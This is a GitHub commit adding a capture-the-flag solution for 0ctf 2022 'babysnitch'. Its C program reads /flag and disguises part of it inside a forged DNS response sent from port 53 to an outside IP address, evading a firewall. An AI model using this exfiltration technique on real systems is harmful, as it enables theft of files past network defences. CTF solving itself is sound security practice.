Skip to content

Commit bea3f44

Browse files
sampritipandasampritipanda
committed
Add 0ctf babysnitch
1 parent 20b5d50 commit bea3f44

File tree

2 files changed

+95
-0
lines changed

2 files changed

+95
-0
lines changed

2022/0ctf-2022/babysnitch/README.md

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
BabySnitch
2+
----------
3+
4+
5+
As docker allows us to bind to privileged ports, we can send a UDP request with srcport 53 and dstport 53 to exfil the flag.
6+
7+
The firewall checks to make sure it's a valid DNS response, so we need to ensure the packet is a valid format and smuggle the flag inside.
8+
9+
Check `solve.c` for the solution.

2022/0ctf-2022/babysnitch/solve.c

Lines changed: 86 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,86 @@
1+
#include <arpa/inet.h>
2+
#include <stdio.h>
3+
#include <stdlib.h>
4+
#include <string.h>
5+
#include <unistd.h>
6+
7+
int main()
8+
{
9+
FILE *f = NULL;
10+
11+
if ((f = fopen("/flag", "rb")) == NULL) {
12+
printf("File read error\n");
13+
return -1;
14+
}
15+
16+
fseek(f, 0, SEEK_END);
17+
long fsize = ftell(f);
18+
fseek(f, 0, SEEK_SET); /* same as rewind(f); */
19+
20+
char *flag = NULL;
21+
if ((flag = malloc(fsize + 1)) == NULL) {
22+
printf("malloc error\n");
23+
return -1;
24+
}
25+
fread(flag, fsize, 1, f);
26+
fclose(f);
27+
28+
flag[fsize] = 0;
29+
30+
int sock = 0;
31+
if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
32+
printf("Socket creation error\n");
33+
return -1;
34+
}
35+
36+
struct sockaddr_in serv_addr, srcaddr;
37+
serv_addr.sin_family = AF_INET;
38+
serv_addr.sin_port = htons(53);
39+
40+
if (inet_pton(AF_INET, "8.9.37.107", &serv_addr.sin_addr) <= 0) {
41+
printf("Address error\n");
42+
return -1;
43+
}
44+
45+
memset(&srcaddr, 0, sizeof(srcaddr));
46+
srcaddr.sin_family = AF_INET;
47+
srcaddr.sin_addr.s_addr = htonl(INADDR_ANY);
48+
srcaddr.sin_port = htons(53);
49+
50+
if (bind(sock, (struct sockaddr *) &srcaddr, sizeof(srcaddr)) < 0) {
51+
perror("bind");
52+
exit(1);
53+
}
54+
55+
unsigned char req[] = { /* Packet 84243 */
56+
0xc3, 0xf1, 0x81, 0x83, 0x00, 0x01, 0x00, 0x00,
57+
0x00, 0x01, 0x00, 0x01, 0x25, 0x70, 0x65, 0x72,
58+
0x66, 0x65, 0x63, 0x74, 0x70, 0x61, 0x64, 0x64,
59+
0x6c, 0x65, 0x72, 0x6c, 0x6d, 0x61, 0x6f, 0x70,
60+
0x65, 0x70, 0x65, 0x67, 0x61, 0x6f, 0x6d, 0x67,
61+
0x73, 0x75, 0x63, 0x6b, 0x6d, 0x79, 0x64, 0x69,
62+
0x63, 0x6b, 0x04, 0x62, 0x6c, 0x75, 0x65, 0x00,
63+
0x00, 0x01, 0x00, 0x01, 0xc0, 0x32, 0x00, 0x06,
64+
0x00, 0x01, 0x00, 0x00, 0x07, 0x08, 0x00, 0x36,
65+
0x02, 0x61, 0x30, 0x03, 0x6e, 0x69, 0x63, 0xc0,
66+
0x32, 0x0a, 0x68, 0x6f, 0x73, 0x74, 0x6d, 0x61,
67+
0x73, 0x74, 0x65, 0x72, 0x06, 0x64, 0x6f, 0x6e,
68+
0x75, 0x74, 0x73, 0x05, 0x65, 0x6d, 0x61, 0x69,
69+
0x6c, 0x00, 0x63, 0x26, 0xb7, 0x93, 0x00, 0x00,
70+
0x1c, 0x20, 0x00, 0x00, 0x03, 0x84, 0x00, 0x12,
71+
0x75, 0x00, 0x00, 0x00, 0x0e, 0x10, 0x00, 0x00,
72+
0x29, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
73+
0x00 };
74+
75+
76+
memcpy(&req[0x10], &flag[0x60], 0x10);
77+
78+
79+
sendto(sock, req, sizeof(req), MSG_CONFIRM, (const struct sockaddr *) &serv_addr, sizeof(serv_addr));
80+
81+
printf("BYE\n");
82+
83+
return 0;
84+
}
85+
86+

0 commit comments

Comments
 (0)